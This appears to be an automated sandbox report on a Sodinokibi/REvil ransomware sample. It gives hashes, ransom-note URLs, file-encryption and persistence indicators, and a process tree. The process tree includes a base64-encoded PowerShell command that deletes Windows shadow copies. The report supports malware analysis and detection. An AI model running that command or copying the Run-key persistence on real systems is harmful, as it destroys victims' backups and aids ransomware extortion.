Analysis
-
max time kernel
133s -
max time network
179s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 01:40
Static task
static1
Behavioral task
behavioral1
Sample
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe
Resource
win10-en-20211208
General
-
Target
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe
-
Size
164KB
-
MD5
6244071a79f902d38b330234e659e1c7
-
SHA1
39c8ea52884950364b18eeccba7bcdfadc263cdf
-
SHA256
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7
-
SHA512
072d42f0177a5772442eb7e07507a4cbb2105df63e3015f1556d56def4d801e529f585b8447999090dc2a590177b0f4b1a2bc63a38d60adb4cba7fd080f6c402
Malware Config
Extracted
C:\How to decrypt a52iae-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4634E5F7AD213DDC
http://decryptor.top/4634E5F7AD213DDC
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exedescription ioc process File renamed C:\Users\Admin\Pictures\RegisterUninstall.png => \??\c:\users\admin\pictures\RegisterUninstall.png.a52iae 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File renamed C:\Users\Admin\Pictures\RenameStep.png => \??\c:\users\admin\pictures\RenameStep.png.a52iae 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File renamed C:\Users\Admin\Pictures\ProtectConfirm.png => \??\c:\users\admin\pictures\ProtectConfirm.png.a52iae 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File renamed C:\Users\Admin\Pictures\StopInvoke.png => \??\c:\users\admin\pictures\StopInvoke.png.a52iae 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File renamed C:\Users\Admin\Pictures\RenameRestart.tiff => \??\c:\users\admin\pictures\RenameRestart.tiff.a52iae 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\users\admin\pictures\RenameRestart.tiff 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File renamed C:\Users\Admin\Pictures\CompleteResolve.crw => \??\c:\users\admin\pictures\CompleteResolve.crw.a52iae 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wtO8FGK8pO = "C:\\Users\\Admin\\AppData\\Local\\Temp\\85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe" 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exedescription ioc process File opened (read-only) \??\P: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\R: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\W: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\Z: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\D: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\B: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\J: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\O: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\U: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\A: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\E: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\N: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\S: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\Y: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\F: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\L: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\I: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\K: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\M: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\Q: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\T: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\V: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\G: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\H: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened (read-only) \??\X: 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1250.bmp" 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe -
Drops file in Program Files directory 21 IoCs
Processes:
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exedescription ioc process File opened for modification \??\c:\program files\MountBackup.vstx 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\SplitSkip.wav 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File created \??\c:\program files (x86)\How to decrypt a52iae-readme.txt 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\ConfirmUnprotect.xltx 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\ExpandExport.jpeg 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\ExpandResolve.au 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\RestartMount.ps1xml 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\StopBackup.htm 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\FindHide.rtf 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\FindLock.vdx 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\ResumeEnable.html 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\SwitchUnpublish.edrwx 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\SyncWait.jfif 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\UnprotectConvertTo.htm 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\How to decrypt a52iae-readme.txt 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\How to decrypt a52iae-readme.txt 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File created \??\c:\program files\How to decrypt a52iae-readme.txt 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\InitializeSubmit.tif 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\StopOpen.dwfx 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File opened for modification \??\c:\program files\WatchRepair.mov 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\How to decrypt a52iae-readme.txt 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exepowershell.exepid process 1668 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe 1288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1288 powershell.exe Token: SeBackupPrivilege 1104 vssvc.exe Token: SeRestorePrivilege 1104 vssvc.exe Token: SeAuditPrivilege 1104 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exedescription pid process target process PID 1668 wrote to memory of 1288 1668 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe powershell.exe PID 1668 wrote to memory of 1288 1668 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe powershell.exe PID 1668 wrote to memory of 1288 1668 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe powershell.exe PID 1668 wrote to memory of 1288 1668 85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe"C:\Users\Admin\AppData\Local\Temp\85b302cc60b348fcde265ff3def78bfed528dbad0590497ac69885f628669fd7.exe"1⤵
- Modifies extensions of user files
- Adds Run key to start application
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1288-55-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmpFilesize
8KB
-
memory/1288-57-0x00000000027F0000-0x00000000027F2000-memory.dmpFilesize
8KB
-
memory/1288-58-0x00000000027F2000-0x00000000027F4000-memory.dmpFilesize
8KB
-
memory/1288-59-0x00000000027F4000-0x00000000027F7000-memory.dmpFilesize
12KB
-
memory/1288-56-0x000007FEF2D90000-0x000007FEF38ED000-memory.dmpFilesize
11.4MB
-
memory/1288-60-0x00000000027FB000-0x000000000281A000-memory.dmpFilesize
124KB
-
memory/1668-54-0x0000000075B51000-0x0000000075B53000-memory.dmpFilesize
8KB